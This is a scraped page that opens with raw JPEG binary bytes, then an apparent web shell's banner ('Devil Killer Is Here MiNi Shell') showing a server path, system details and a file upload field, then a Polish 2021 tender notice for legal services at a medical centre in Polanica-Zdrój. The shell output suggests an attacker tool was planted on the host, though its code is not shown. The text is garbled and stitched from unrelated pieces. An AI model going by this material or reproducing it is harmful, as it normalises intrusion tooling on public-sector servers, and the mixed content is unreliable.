JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210728/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210728/0012969902-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00129699 z dnia 2021-07-28</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> ZP/TP/2021/27 - obsługa prawna II </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">SPECJALISTYCZNE CENTRUM MEDYCZNE IM. ŚW. JANA PAWŁA II SPÓŁKA AKCYJNA</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 020493961</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Jana Pawła II 2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Polanica-Zdrój</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">57-320</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL517 - Wałbrzyski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zp@scm.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">bip.scm.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> ZP/TP/2021/27 - obsługa prawna II </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-4615c4c2-ef91-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00129699</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">02</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-07-28</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://bip.scm.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://bip.scm.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">11.	Informacje o sposobie porozumiewania się Zamawiającego z Wykonawcami oraz przekazywania oświadczeń <br/>i dokumentów, a także wskazanie osób uprawnionych do porozumiewania się z Wykonawcami.<br/>11.1. W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa przy użyciu <br/> środków komunikacji elektronicznej, za pośrednictwem miniPortalu https://miniportal.uzp.gov.pl/, ePUAPu <br/> https://epuap.gov.pl/wps/portal oraz poczty elektronicznej na adres zp@scm.pl.<br/>Pytania do Zamawiającego można zadawać na adres zp@scm.pl z wyraźnym podaniem w tytule symbolu postępowania ZP/TP/2021/27 - obsługa prawna II.<br/> 11.2. Zamawiający wyznacza następujące osoby do kontaktu z Wykonawcami: Małgorzata Siedlecka, Dominika Tust-Kopeć, email: zp@scm.pl<br/> 11.3. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do formularzy: złożenia, zmiany, wycofania oferty lub wniosku oraz do formularza do komunikacji.<br/> 11.4. Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z miniPortalu oraz Regulaminie ePUAP.<br/> 11.5. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy do: złożenia, zmiany, wycofania oferty lub wniosku oraz do komunikacji wynosi 150 MB.<br/> 11.6. Za datę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich przekazania na ePUAP.<br/>11.7. Identyfikator postępowania o udzielenie zamówienia dostępne są na liście wszystkich postępowań na miniPortalu.<br/>11.8.	Odpowiedzi na zadane pytania, informacje dodatkowe itp. umieszczane będą na stronie internetowej – https://bip.scm.pl – zakładka zamówienia publiczne i przekazywane Wykonawcom zgodnie z art. 284 ust. 6 ustawy.<br/>11.9.	Specyfikację Warunków Zamówienia można pobrać bezpłatnie ze strony internetowej Zamawiającego https://bip.scm.pl zakładka zamówienia publiczne.<br/>11.10.	Wynik postępowania zostanie przekazany za pomocą poczty elektronicznej, na wskazany w ofercie adres e-mail.<br/>11.11. Informację podane podczas otwarcia ofert złożonych do postępowania, stosownie do art. 222 ust. 5 UPzp, Zamawiający <br/> niezwłocznie zamieści na stronie internetowej https://bip.scm.pl.<br/>11.12	Zamawiający nie udziela żadnych ustnych i telefonicznych informacji.<br/>14.3	Oferta powinna być sporządzona w języku polskim, z zachowaniem postaci elektronicznej w formacie danych, w szczególności .doc, .docx, .xls, .xlsx, .ods, .odt, rtf, .pdf i podpisana kwalifikowanym podpisem elektronicznym, zaufanym lub osobistym.</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://bip.scm.pl</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Zamawiający dopuszcza złożenie oferty w postaci katalogu</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Klauzula informacyjna<br/><br/>Zgodnie z art.13 ust. 1 i 2 Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (zwanego dalej - ogólne rozporządzenie o ochronie danych lub RODO) informujemy, że:<br/>Administratorem Państwa danych osobowych jest Specjalistyczne Centrum Medyczne im. św. Jana Pawła II spółka akcyjna z siedzibą w Polanicy-Zdroju (dalej: Spółka).<br/> Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w <br/>celu przeprowadzenia postępowania o udzielenie zamówienia publicznego prowadzonego w trybie podstawowym bez negocjacji oznaczonego ZP/TP/2021/27 - obsługa prawna II.<br/>W związku z przetwarzaniem Państwa danych osobowych przysługują Państwu: prawo dostępu do swoich danych osobowych oraz ich sprostowania, usunięcia, ograniczenia przetwarzania, prawo do przenoszenia danych, prawo do wniesienia sprzeciwu wobec przetwarzania - o ile zachodzą okoliczności i przypadki określone prawem.<br/>Mają Państwo prawo wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uznają Państwo, że przetwarzanie danych osobowych Państwa dotyczących narusza przepisy RODO.<br/>Zakres danych, które przetwarzamy jest niezbędny do osiągnięcia wskazanego wyżej celu. Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Prawo zamówień publicznych. Niepodanie określonych danych skutkuje brakiem możliwości rozpatrzenia przez nas Państwa oferty.<br/>Pani/Pana dane osobowe będą przechowywane, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy.<br/>Na podstawie Państwa danych osobowych Administrator nie będzie podejmował wobec Państwa zautomatyzowanych decyzji, w tym decyzji będących wynikiem profilowania.<br/>Państwa dane mogą być przekazane podmiotom uprawnionym do uzyskania danych na podstawie obowiązującego prawa.<br/>Mogą Państwo realizować swoje prawa kierując korespondencję na adres: Specjalistyczne Centrum Medyczne im. św. Jana Pawła II spółka akcyjna 57-320 Polanica-Zdrój, ul. Jana Pawła II 2,<br/>Mogą Państwo również napisać do Inspektora Ochrony Danych w Spółce na adres e-mail: daneosobowe@scm.pl</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP/TP/2021/27 - obsługa prawna II</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiot zamówienia <br/>	Przedmiotem zamówienia jest świadczenie przez Wykonawcę na rzecz Zamawiającego Specjalistycznego Centrum <br/> Medycznego im. św. Jana Pawła II S.A. w Polanicy-Zdroju, zwana dalej SWZ usług polegających na:<br/> sprawowaniu kompleksowej obsługi prawnej przez osoby legitymujące się odpowiednimi kwalifikacjami lub Kancelarie <br/> Prawne zatrudniające wykwalifikowany personel niezbędny do realizacji przedmiotu zamówienia. <br/>3.1. W ramach kompleksowej obsługi prawnej Wykonawca zobowiązany będzie w szczególności do: <br/>1)	udzielania porad prawnych w formie pisemnej oraz ustnej,<br/>2)	sporządzanie pisemnych opinii prawnych,<br/>3)	analizowanie oraz opiniowanie dokumentów powstających w spółce w tym także aktów prawa wewnątrzzakładowego oraz weryfikowanie ich pod kątem formalno-prawnym, <br/>4)	udzielanie wskazówek w zakresie merytorycznym dotyczących dokumentów podlegających analizie oraz opiniowaniu,<br/>5)	współuczestniczenie w przygotowaniu postępowań realizowanych w trybie ustawy PZP oraz ustawy z dnia 15 kwietnia 2011 r. o działalności leczniczej (Dz. U. z 2011, Nr 112, 654 z późn. zm),<br/>6)	przygotowywanie projektów umów oraz opiniowanie przedstawionych przez Zamawiającego umów zawieranych z innymi kontrahentami,<br/>7)	zastępstwo prawne oraz procesowe w sprawach cywilnych, administracyjnych, karnych, ze stosunku pracy,<br/>8)	zastępstwo prawne przed Komisją ds. orzekania o zdarzeniach medycznych,<br/>9)	zastępstwo prawne oraz procesowe wobec dłużników Zamawiającego łącznie <br/>z reprezentowaniem w postępowaniach egzekucyjnych, <br/>10)	sprawowanie obsługi prawnej Zarządu, <br/>11) przygotowanie dokumentów na rzecz Zarządu oraz opiniowanie dokumentów sporządzanych przez Biuro Zarządu,<br/>12)	współpraca z komórkami organizacyjnymi Zamawiającego w zakresie opracowywania aktów prawa wewnątrzzakładowego w tym m.in. zarządzeń, instrukcji, wytycznych, regulaminów,<br/>13)	informowanie Zamawiającego o zmianach w obowiązujących przepisach prawnych mających zastosowanie dla prowadzonej przez Zamawiającego działalności,<br/>14)	składanie Zamawiającemu w okresie nie rzadziej niż co 3 miesiące pisemnego sprawozdania o stanie prowadzonych spraw sądowych,<br/>15)	zapewnienie dalszego prowadzenia i reprezentacji we wskazanych przez Zamawiającego postępowaniach sądowych, administracyjnych lub innych będących w toku (rozpoczętych przed udzieleniem zamówienia),<br/>16)	zapewnienie prowadzenia postępowań sądowych, administracyjnych i egzekucyjnych po ustaniu okresu obowiązywania umowy a wszczętych w czasie trwania umowy w terminie 2 m-cy od dnia zakończenia umowy.<br/>3.2. Przedmiot zamówienia realizowany będzie w siedzibie Zamawiającego przez min. 2 dni w tygodniu w wymiarze nie <br/> mniejszym niż 3 godz. dziennie. W pozostałych godzinach obsługa sprawowana będzie za pośrednictwem urządzeń <br/> porozumiewania się na odległość w tym m.in. telefon, faks, e-mail. <br/>3.3. W uzasadnionych przypadkach obsługa prawna sprawowana będzie także w pozostałe dni tygodnia stosownie do <br/> potrzeb Zamawiającego. <br/>3.4. Wynagrodzenie wykonawcy płatne będzie w formie ryczałtowego wynagrodzenia miesięcznego obejmującego wszelkie <br/> koszty związane z realizacją przedmiotu zamówienia, za wyjątkiem kosztów obciążających Zamawiającego <br/> wynikających z przepisów powszechnie obowiązujących w tym w szczególności opłaty skarbowe oraz sądowe. <br/>3.5. Poza wynagrodzeniem, o którym mowa w ust 3.5 Wykonawcy przysługiwać będzie wynagrodzenie wynikające z tytułu <br/> pełnionego zastępstwa procesowego oraz w postępowaniu egzekucyjnym stosownie do obowiązujących w tym zakresie <br/> przepisów oraz wydanych orzeczeń. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79110000-8 - Usługi w zakresie doradztwa prawnego i reprezentacji prawnej</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">. Opis kryteriów, którymi Zamawiający będzie się kierował przy wyborze oferty wraz z podaniem znaczenia tych <br/> kryteriów i sposobu oceny ofert<br/>15.1. Oceny ofert będzie dokonywała komisja. W toku badania i oceny ofert Zamawiający może żądać od Wykonawców wyjaśnień <br/> dotyczących treści złożonych ofert oraz dokonywać poprawek oczywistych omyłek pisarskich i rachunkowych w obliczeniu <br/> ceny, niezwłocznie zawiadamiając o tym Wykonawcę, którego oferta została poprawiona. Zamawiający odrzuci ofertę <br/> zawierającą błędy w obliczeniu ceny. <br/>15.2. W prowadzonym postępowaniu Zamawiający kierował się będzie następującymi kryteriami: <br/>1)	70 % oceny oferty za cenę oferty <br/>2)	30% oceny oferty za doświadczenie – stosownie do wymagań określonych w ust. 7.1 pkt.3<br/><br/>15.3. W zakresie doświadczenia ocenie podlegają:<br/> 1) Doświadczenie w obsłudze szpitali powyżej 5 lat – 15 pkt.<br/> 2) Doświadczenie w obsłudze spółek kapitałowych powyżej 3 lat – 7 pkt.<br/> 3) Doświadczenie w obsłudze spółek akcyjnych prowadzących działalność medyczną – 8 pkt.<br/> 4) Maksymalna ilość punktów za doświadczenie – 30pkt.<br/><br/>15.4. Dla porównania cen złożonych ofert Zamawiający stosował będzie następujący wzór:<br/><br/>	Najniższa cena ze złożonych ofert <br/>	----------------------------------------------- x 100pkt x 70% = ilość punktów za cenę<br/> cena oferty badanej<br/><br/>15.5. Wybrana zostanie oferta, która uzyska łącznie najwyższą liczbę punktów.<br/>15.6. Ocenie będą podlegać wyłącznie oferty nie podlegające odrzuceniu.<br/>15.7. W sytuacji, gdy Zamawiający nie będzie mógł dokonać wyboru najkorzystniejszej oferty ze względu na to, że zostały <br/> złożone oferty o takiej samej cenie, wezwie on Wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym <br/> przez Zamawiającego ofert dodatkowych zawierających nową cenę. Wykonawcy, składając oferty dodatkowe, nie mogą <br/> zaoferować cen wyższych niż zaoferowane w uprzednio złożonych przez nich ofertach.<br/>15.8. Jeżeli zostanie złożona oferta, której wybór prowadziłby do powstania u Zamawiającego obowiązku podatkowego zgodnie <br/> z ustawą z dnia 11 marca 2004 r. o podatku od towarów i usług (Dz. U. z 2018 r. poz. 2174, z późn. zm.), dla celów <br/> zastosowania kryterium ceny Zamawiający dolicza do przedstawionej w tej ofercie ceny kwotę podatku od towarów i usług, <br/> którą miałby obowiązek rozliczyć.<br/>15.9. W ofercie, o której mowa w pkt.15.8., Wykonawca ma obowiązek: <br/>15.9.1 poinformowania Zamawiającego, że wybór jego oferty będzie prowadził do powstania u Zamawiającego obowiązku podatkowego;<br/>15.9.2	wskazania nazwy (rodzaju) towaru lub usługi, których dostawa lub świadczenie będą prowadziły do powstania obowiązku podatkowego;<br/>15.9.3 wskazania wartości towaru lub usługi objętego obowiązkiem podatkowym Zamawiającego, bez kwoty podatku;<br/>15.9.4 wskazania stawki podatku od towarów i usług, która zgodnie z wiedzą Wykonawcy, będzie miała zastosowanie.<br/>15.10	Zamawiający wybiera najkorzystniejszą ofertę w terminie związania ofertą określonym w SWZ.<br/>15.11	Jeżeli termin związania ofertą upłynie przed wyborem najkorzystniejszej oferty, Zamawiający wezwie Wykonawcę, którego oferta otrzymała najwyższą ocenę, do wyrażenia, w wyznaczonym przez Zamawiającego terminie, pisemnej zgody na wybór jego oferty.<br/>15.12	W przypadku braku zgody, o której mowa w pkt 15.11, oferta podlega odrzuceniu, a Zamawiający zwraca się o wyrażenie takiej zgody do kolejnego Wykonawcy, którego oferta została najwyżej oceniona, chyba że zachodzą przesłanki do unieważnienia postępowania.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">70</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">ocena oferty za doświadczenie</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 7.1.	W celu wykazania spełniania przez Wykonawcę warunków o których mowa w art. 112 ustawy Pzp Wykonawca zobowiązany jest do złożenia następujących dokumentów i oświadczeń: <br/>7.1.1.	Zdolność do występowania w obrocie gospodarczym - na potwierdzenie Zamawiający żąda od Wykonawcy prowadzącego działalność gospodarczą lub zawodową dokumentu potwierdzającego, że jest wpisany do jednego z rejestrów zawodowych lub handlowych prowadzonych w kraju, w którym ma siedzibę lub miejsce zamieszkania, wystawionego nie wcześniej niż 3 miesięcy przed upływem terminu składania ofert.<br/>7.1.2.	Wykonawca musi znajdować się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, na <br/>potwierdzenie Zamawiający żąda złożenia oświadczenia z art. 273 ustawy Pzp – wg wzoru- ZAŁĄCZNIK NR 2 do SWZ, <br/>7.1.3. Zamawiający żąda następujących podmiotowych środków dowodowych: <br/> 7.1.3.1. wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności <br/> odpowiedzialnych za świadczenie usług wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, <br/> doświadczenia i wykształcenia niezbędnych do wykonania zamówienia pulblicznego, a także zakresu wykonywanych <br/> przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami; <br/> 7.1.3.2. Zamawiający uzna spełnienie warunku, jeżeli Wykonawca wykaże, że osoby wyznaczone do sprawowania <br/> kompleksowej obsługi prawnej posiadają uprawnienia do wykonywania zawodu radcy prawnego lub adwokata, o których <br/> mowa w ustawie z dnia 6 lipca 1982 r. o radcach prawnych (t.j. Dz. U. z 2020 r. poz.75 z późn. zm .) lub ustawie z dnia <br/> 26 maja 1982 r. Prawo o adwokaturze (t.j. Dz. U. z 2020 r. poz. 1651 z późn. zm .) w ilości co najmniej 2 osób <br/> posiadających co najmniej 5 letnie doświadczenie w wykonywaniu zawodu w tym co najmniej 1 osoba specjalista w <br/> dziedzinie prawa medycznego; posiadania wiedzy i doświadczenia – Zamawiający uzna spełnienie warunku, jeżeli <br/> Wykonawca udokumentuje co najmniej 5 letnie doświadczenie w obsłudze szpitali oraz co najmniej 3 letnie <br/> doświadczenie w obsłudze spółek kapitałowych, w tym także w spółkach akcyjnych – min. 2 lata, prowadzących <br/> działalność leczniczą przy czym działalność ta powinna być prowadzona w szpitalach o min. 200 łóżkach, oraz <br/> udokumentuje, iż w okresie ostatnich 3 lat prowadził min. 2 sprawy sądowe z zakresu błędów medycznych o wartości <br/> przedmiotu sprawy min. 1 000.000,00 zł każda; <br/>7.1.4. Wykonawca musi posiadać zdolność techniczną i zawodową. Zamawiający uzna warunek za spełniony, jeżeli <br/> Wykonawca udokumentuje, że posiada środki finansowe w ilości umożliwiającej wykonanie przedmiotu zamówienia <br/> poprzez złożenie 